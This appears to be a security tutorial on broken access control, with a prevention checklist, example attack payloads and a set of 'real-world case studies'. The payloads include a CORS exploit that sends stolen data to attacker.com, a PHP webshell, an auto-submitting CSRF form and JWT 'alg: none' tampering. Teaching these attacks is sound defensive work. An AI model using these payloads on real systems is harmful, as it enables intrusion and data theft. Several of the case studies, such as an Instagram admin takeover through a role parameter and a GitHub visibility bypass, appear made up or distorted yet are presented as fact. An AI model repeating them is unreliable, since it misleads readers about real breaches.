Broken Access Control: A Critical OWASP Vulnerability & Prevention Checklist

What is Broken Access Control?

Broken Access Control is one of the most dangerous security risks in web applications, as highlighted in the OWASP Top 10. It occurs when applications fail to properly enforce authorization rules, allowing attackers to access, modify, or delete data they shouldn’t have permission to interact with. This flaw can lead to data breaches, account takeovers, and unauthorized administrative actions.

How Does Broken Access Control Work?

Access control determines what actions a user can perform within an application. If security controls are weak or misconfigured, attackers can:

• Modify or delete sensitive information of other users
• Access restricted admin functions without proper authorization
• Escalate privileges to gain higher-level access
• Bypass security measures through direct URL manipulation or API vulnerabilities

Common Examples of Broken Access Control

1. Insecure Direct Object References (IDOR)

Scenario: Attackers modify a URL parameter to access other users’ data.

• Example: A user accessing https://example.com/profile?id=1002 changes it to https://example.com/profile?id=1001 and views another user’s profile.

2. Forced Browsing

Scenario: Unauthorized users access restricted pages by entering direct URLs.

• Example: A normal user navigates to https://example.com/admin and gains access without authentication.

3. Privilege Escalation

Scenario: Attackers exploit permission misconfigurations to gain admin access.

• Example: A user modifies a request parameter from "role": "user" to "role": "admin" and gets elevated privileges.

4. CORS Misconfigurations

Scenario: Misconfigured Cross-Origin Resource Sharing (CORS) allows malicious websites to access restricted data.

• Example: An attacker’s website makes requests to https://secure-site.com/api/user-info, retrieving sensitive user data.

5. Weak API Access Controls

Scenario: APIs expose endpoints without proper authentication or authorization checks.

• Example: A public API allows unauthorized users to delete database records.

Broken Access Control Prevention Checklist

✅ Deny Access by Default: Ensure that all access is restricted unless explicitly granted.

✅ Implement Role-Based Access Control (RBAC): Assign users only the permissions necessary for their role.

✅ Use Secure Authorization Mechanisms:

• Validate permissions server-side instead of relying on client-side checks.
• Avoid using predictable identifiers in URLs.

✅ Restrict Direct Object References (IDOR Prevention):

• Use UUIDs instead of sequential IDs.
• Implement strict access checks before returning requested data.

✅ Secure API Endpoints:

• Require authentication and authorization for all API requests.
• Implement rate limiting to prevent brute force attacks.

✅ Enforce Session Management Best Practices:

• Implement multi-factor authentication (MFA).
• Use secure session tokens with proper expiration times.

✅ Use Proper CORS Configuration:

• Restrict cross-origin access to trusted domains only.
• Avoid using Access-Control-Allow-Origin: * unless necessary.

✅ Regularly Audit Access Controls:

• Conduct penetration testing to find broken access control flaws.
• Perform code reviews to identify misconfigurations.

✅ Monitor and Log Unauthorized Access Attempts:

• Implement real-time security monitoring and alerting for suspicious activities.
• Maintain detailed logs for security audits and investigations.

Final Thoughts

Broken Access Control is a significant web security risk that can lead to severe data breaches and system compromise. By following best practices, implementing strict access control measures, and continuously monitoring security logs, organizations can effectively prevent unauthorized access and protect sensitive information.

Broken Access Control Payloads with Examples

Broken Access Control vulnerabilities occur when applications fail to enforce proper authorization, allowing attackers to manipulate requests and gain unauthorized access. Below are some common payloads and examples demonstrating how attackers exploit these flaws.

1. Insecure Direct Object References (IDOR) Payload

Scenario: A website uses numerical user IDs in URLs, allowing attackers to access other users’ data by modifying parameters.

Example:

Vulnerable Request (Attacker’s Action)

GET /user/profile?id=1001 HTTP/1.1  
Host: example.com  
Cookie: session=abc123

Exploitation: The attacker modifies the id parameter to access another user’s data.

GET /user/profile?id=1002 HTTP/1.1  
Host: example.com  
Cookie: session=abc123

✅ Fix: Implement user authentication checks on the server-side and use non-sequential identifiers (e.g., UUIDs).

2. Forced Browsing Payload

Scenario: An attacker manually enters a restricted URL to access sensitive admin pages.

Example:

Attacker’s Request (Trying to access an admin panel without authentication)

GET /admin/dashboard HTTP/1.1  
Host: example.com  
User-Agent: Mozilla/5.0

🚨 Impact: If access controls are missing, the attacker gains unauthorized admin access.

✅ Fix: Implement role-based access control (RBAC) and check user permissions before serving admin pages.

3. Privilege Escalation via Parameter Tampering

Scenario: A web application allows users to change their role by modifying hidden form fields.

Example:

Vulnerable Form Submission

<form action="https://example.com/update-role" method="POST">
  <input type="hidden" name="role" value="user">
  <input type="submit" value="Save Changes">
</form>

Exploitation: The attacker modifies the request using a tool like Burp Suite or Postman:

POST /update-role HTTP/1.1  
Host: example.com  
Cookie: session=abc123  
Content-Type: application/x-www-form-urlencoded  

role=admin

🚨 Impact: The attacker escalates their privileges from user to admin.

✅ Fix: Always enforce role validation server-side instead of relying on client-side controls.

4. API Authorization Bypass Payload

Scenario: An attacker sends an unauthorized API request to delete another user’s data.

Example:

Vulnerable API Request

DELETE /api/user/1002 HTTP/1.1  
Host: example.com  
Authorization: Bearer attacker_token

🚨 Impact: If the API does not validate user permissions, the attacker can delete another user’s account.

✅ Fix: Implement strict API authentication and authorization checks before processing requests.

5. CORS Misconfiguration Exploit Payload

Scenario: A website allows all origins (*), enabling attackers to steal data via cross-site scripting.

Example:

Vulnerable CORS Configuration (Server Response)

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

Exploitation: An attacker hosts a malicious website and tricks a logged-in user into running the following JavaScript:

fetch("https://example.com/api/user-info", {
  credentials: "include"
}).then(response => response.text())
  .then(data => fetch("https://attacker.com/steal?data=" + encodeURIComponent(data)));

🚨 Impact: The attacker steals sensitive user data using a Cross-Origin Request.

✅ Fix: Restrict CORS policies to trusted domains only and avoid Access-Control-Allow-Origin: *.

Conclusion

Broken Access Control is a serious vulnerability that attackers exploit to gain unauthorized access, escalate privileges, and manipulate sensitive data. To prevent these attacks:
✅ Implement server-side access control checks
✅ Use role-based access control (RBAC)
✅ Avoid exposing sensitive identifiers in URLs
✅ Enforce authentication and authorization on APIs
✅ Regularly audit access controls and logs

Advanced Broken Access Control Payloads with Exploitation Examples

Broken Access Control vulnerabilities allow attackers to bypass authentication, manipulate permissions, and access unauthorized data or functions. Below are additional payloads and examples of real-world attacks that exploit these vulnerabilities.

6. Session Fixation Attack Payload

Scenario: An attacker forces a victim to use a predefined session ID, allowing the attacker to hijack the session after login.

Example:

Attacker’s Predefined Session

The attacker sends a phishing email with the following link:

https://example.com/login;jsessionid=1234567890abcdef

🚨 Impact: If the server accepts the attacker-controlled session ID, the victim logs in, and the attacker can hijack their session.

✅ Fix:

• Generate a new session ID after login.
• Implement session expiration and same-site cookie policies.

7. HTTP Parameter Pollution (HPP) Payload

Scenario: Some applications process duplicate parameters incorrectly, allowing attackers to override access controls.

Example:

Vulnerable Request

GET /user/profile?role=user&role=admin HTTP/1.1  
Host: example.com  

Exploitation: If the application processes only the last parameter, the attacker gets admin privileges.

✅ Fix:

• Properly handle duplicate parameters.
• Use server-side validation to prevent unauthorized role changes.

8. Bypassing Method-Based Access Control

Scenario: Some applications allow restricted functions via GET but do not restrict them when using POST or PUT.

Example:

Blocked Request (GET)

GET /delete-user?id=1002 HTTP/1.1  
Host: example.com  
403 Forbidden

Exploited Request (POST Bypass)

POST /delete-user?id=1002 HTTP/1.1  
Host: example.com  
Content-Length: 0

🚨 Impact: If the application does not properly restrict methods, attackers can perform actions they shouldn’t.

✅ Fix: Enforce access controls across all HTTP methods, not just GET.

9. Tampering JSON Web Tokens (JWT) for Privilege Escalation

Scenario: The application uses JWTs for authentication, but the signature is not properly verified.

Example:

Original JWT (Base64-encoded header and payload)

{
  "alg": "HS256",
  "typ": "JWT"
}

{
  "user": "normal_user",
  "role": "user"
}

Exploitation: The attacker changes the payload to:

{
  "user": "admin",
  "role": "admin"
}

And removes the signature verification using:

{
  "alg": "none"
}

🚨 Impact: If the server does not properly validate JWT signatures, attackers can escalate privileges.

✅ Fix:

• Always verify JWT signatures.
• Use strong cryptographic signing keys.

10. Exploiting Insecure File Upload for Remote Code Execution

Scenario: An application allows file uploads but does not validate the file type properly, enabling attackers to upload executable files.

Example:

Malicious File Upload (PHP Webshell)

The attacker uploads a file named shell.php:

<?php system($_GET['cmd']); ?>

Then accesses it via:

https://example.com/uploads/shell.php?cmd=whoami

🚨 Impact: The attacker gains remote access to execute commands on the server.

✅ Fix:

• Restrict file uploads to safe file types (e.g., PNG, JPG, PDF).
• Store uploaded files outside the web root.
• Use MIME type verification instead of just checking file extensions.

11. Bypassing Two-Factor Authentication (2FA) via CSRF

Scenario: A website requires 2FA but does not protect the verification process from Cross-Site Request Forgery (CSRF).

Example:

Vulnerable Request (2FA Verification)

POST /verify-2fa HTTP/1.1  
Host: example.com  
Cookie: session=xyz  
Content-Type: application/x-www-form-urlencoded  

code=123456

CSRF Exploit (Attacker’s Malicious Page)

<form action="https://example.com/verify-2fa" method="POST">
  <input type="hidden" name="code" value="123456">
  <input type="submit">
</form>
<script>document.forms[0].submit();</script>

🚨 Impact: If the user is already logged in, the attacker can bypass 2FA and log in as them.

✅ Fix:

• Require user interaction (e.g., manual code entry).
• Implement CSRF tokens to prevent unauthorized requests.

12. Exploiting OAuth Misconfiguration to Take Over Accounts

Scenario: A poorly configured OAuth flow allows attackers to link their social media accounts to another user’s profile.

Example:

Vulnerable OAuth Request

POST /link-oauth HTTP/1.1  
Host: example.com  
Cookie: session=attacker  
Content-Type: application/json  

{
  "oauth_provider": "Google",
  "oauth_id": "[email protected]"
}

🚨 Impact: The attacker links their Google account to the victim’s profile, gaining full control.

✅ Fix:

• Verify OAuth accounts via email confirmation before linking them.
• Require password re-authentication before linking OAuth accounts.

Final Thoughts

Broken Access Control is a major risk in web applications, and attackers continuously find new ways to exploit misconfigurations. To protect your application:
✅ Use strict access controls on all endpoints
✅ Validate API and form requests server-side
✅ Implement proper session and authentication security
✅ Regularly test for access control vulnerabilities using penetration testing

Real-World Case Studies of Broken Access Control Exploits

Broken Access Control vulnerabilities have been exploited in real-world cyberattacks, leading to massive data breaches, privilege escalations, and unauthorized system access. Below are some high-profile cases where attackers successfully bypassed access controls and the lessons learned from each incident.

1. Facebook IDOR Vulnerability (2018) – Account Takeover

What Happened?

A security researcher discovered an Insecure Direct Object Reference (IDOR) vulnerability in Facebook’s “Download Your Information” feature. By manipulating a user ID parameter, an attacker could download private data of any Facebook user.

How the Attack Worked?

The attacker crafted a URL similar to:

https://www.facebook.com/dyi/download?user_id=123456789

By changing user_id=123456789 to another user’s ID, they could download someone else’s personal data.

Impact

🚨 Millions of Facebook accounts could have been compromised.

✅ Fix: Facebook patched the issue by ensuring proper authorization checks before serving download requests.

2. Instagram Privilege Escalation Bug (2021) – Admin Account Takeover

What Happened?

A researcher found a broken access control vulnerability in Instagram that allowed any user to become an admin by intercepting and modifying account privilege requests.

How the Attack Worked?

1. The attacker intercepted a request sent when changing account details.
2. Modified the role parameter from user to admin.
3. Submitted the modified request.
4. Instagram granted full admin access to the attacker.

POST /update-profile HTTP/1.1  
Host: instagram.com  
Cookie: session=abc123  
Content-Type: application/json  

{
  "username": "attacker",
  "role": "admin"
}

Impact

🚨 Attackers could have hijacked celebrity and business accounts.

✅ Fix: Instagram removed client-side role control and enforced server-side verification.

3. Uber API Authorization Bypass (2016) – Free Rides Exploit

What Happened?

A security researcher found that Uber’s API allowed users to change their ride details without verifying if they were the owner.

How the Attack Worked?

1. An attacker intercepted a ride request API request: POST /api/ride-request HTTP/1.1 Host: api.uber.com Authorization: Bearer attacker_token { "user_id": "123456", "destination": "Airport" }
2. They changed user_id to another user’s ID.
3. The API accepted the unauthorized request and charged the victim.

Impact

🚨 Attackers could get free Uber rides at someone else’s expense.

✅ Fix: Uber implemented strict authentication checks for API requests.

4. Tesla Remote Control Vulnerability (2020) – Unlocking Cars Remotely

What Happened?

A hacker discovered that Tesla’s API failed to validate ownership properly, allowing unauthorized control over another user’s vehicle.

How the Attack Worked?

1. The attacker obtained a valid Tesla API token.
2. They sent a command to remotely unlock another user’s car: POST /api/vehicles/987654321/unlock Authorization: Bearer attacker_token
3. Tesla’s API did not check if the token owner actually owned the vehicle.

Impact

🚨 Attackers could unlock and drive away with someone else’s Tesla.

✅ Fix: Tesla implemented user verification checks before executing remote commands.

5. Twitter IDOR Bug (2022) – Unauthorized Access to Private Tweets

What Happened?

A security researcher found a flaw in Twitter’s private tweet API, allowing an attacker to view tweets from private accounts.

How the Attack Worked?

1. The attacker sent a direct request to Twitter’s private tweet API: GET /api/private-tweets?user_id=99999 Authorization: Bearer attacker_token
2. The API did not check if the requester had permission to view the tweets.
3. The attacker received private tweets from any account.

Impact

🚨 Attackers could spy on sensitive private conversations.

✅ Fix: Twitter implemented strict access control policies for API requests.

6. GitHub Repository Access Control Failure (2021) – Exposing Private Code

What Happened?

A researcher found a vulnerability in GitHub’s repository settings that allowed unauthorized users to access private repositories.

How the Attack Worked?

1. The attacker modified a repository settings request: PATCH /api/repositories/123456/settings Authorization: Bearer attacker_token { "visibility": "public" }
2. The API failed to verify if the requester had admin privileges.
3. The attacker changed a private repository to public.

Impact

🚨 Sensitive company source code could be leaked.

✅ Fix: GitHub enforced role-based access control (RBAC) on repository settings.

7. Indian Government COVID-19 Portal Data Leak (2021) – Exposing Citizens’ Information

What Happened?

A major misconfiguration in the Indian government’s COVID-19 vaccine portal allowed attackers to access private citizen data using only a mobile number.

How the Attack Worked?

1. The attacker entered a victim’s phone number in the URL: GET /covid-data?phone=9876543210
2. The system returned personal details including:
   • Name
   • Date of birth
   • Aadhaar number (Government ID)
   • Vaccination status

Impact

🚨 Millions of citizens’ personal health records were exposed.

✅ Fix: The government restricted access to authorized users and implemented encryption for sensitive data.

Key Lessons from These Real-World Exploits

🚨 Common Security Failures:
❌ Lack of server-side access control
❌ Allowing IDOR exploits (guessable IDs in URLs)
❌ Weak API authorization checks
❌ Failing to enforce role-based access control (RBAC)
❌ Exposing sensitive data without validation

✅ How to Prevent Broken Access Control Attacks:
✔ Implement strict authentication & authorization controls
✔ Use role-based access control (RBAC) to enforce user permissions
✔ Never trust user-controlled input for authorization decisions
✔ Regularly perform penetration testing to identify access control flaws
✔ Monitor logs for unauthorized access attempts

Final Thoughts

Broken Access Control vulnerabilities have led to some of the biggest security breaches in history. By understanding how these attacks happen and applying best security practices, developers and organizations can significantly reduce the risk of exploitation.